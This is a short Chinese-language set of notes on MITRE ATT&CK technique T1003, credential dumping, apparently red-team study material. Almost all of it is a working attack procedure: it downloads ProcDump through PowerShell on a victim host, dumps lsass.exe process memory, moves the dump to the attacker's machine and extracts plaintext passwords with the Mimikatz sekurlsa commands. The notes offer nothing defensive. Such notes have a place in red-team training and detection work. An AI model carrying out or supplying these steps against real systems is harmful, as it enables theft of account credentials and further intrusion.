Credential Dumping 凭证转储
- ID: T1003
- Source: https://attack.mitre.org/techniques/T1003/
Details
ProcDump and Mimikatz
- 下载
ProcDump
工具到需要抓取密码的那台主机上:
可以使用 Powershell来下载,或者bitsadmin还有Certutil
powershell Invoke-WebRequest -Uri "https://download.sysinternals.com/files/Procdump.zip" -OutFile %ALLUSERSPROFILE%\Procdump.zip
- 解压
Procdump.zip
在受害者机器上 - 在受害者主机上转储lsass.exe的进程内存(使用克隆转储):
%ALLUSERSPROFILE%\procdump.exe -accepteula -ma lsass.exe lsass.dmp -r
- 将
lsass.dmp
文件下载到攻击者本地 - 使用 Mimikatz (x64/mimikatz.exe) 以获取明文密码:
- Run Mimikatz
- 输入
sekurlsa::Minidump lsass.dmp
- 输入
sekurlsa::logonPasswords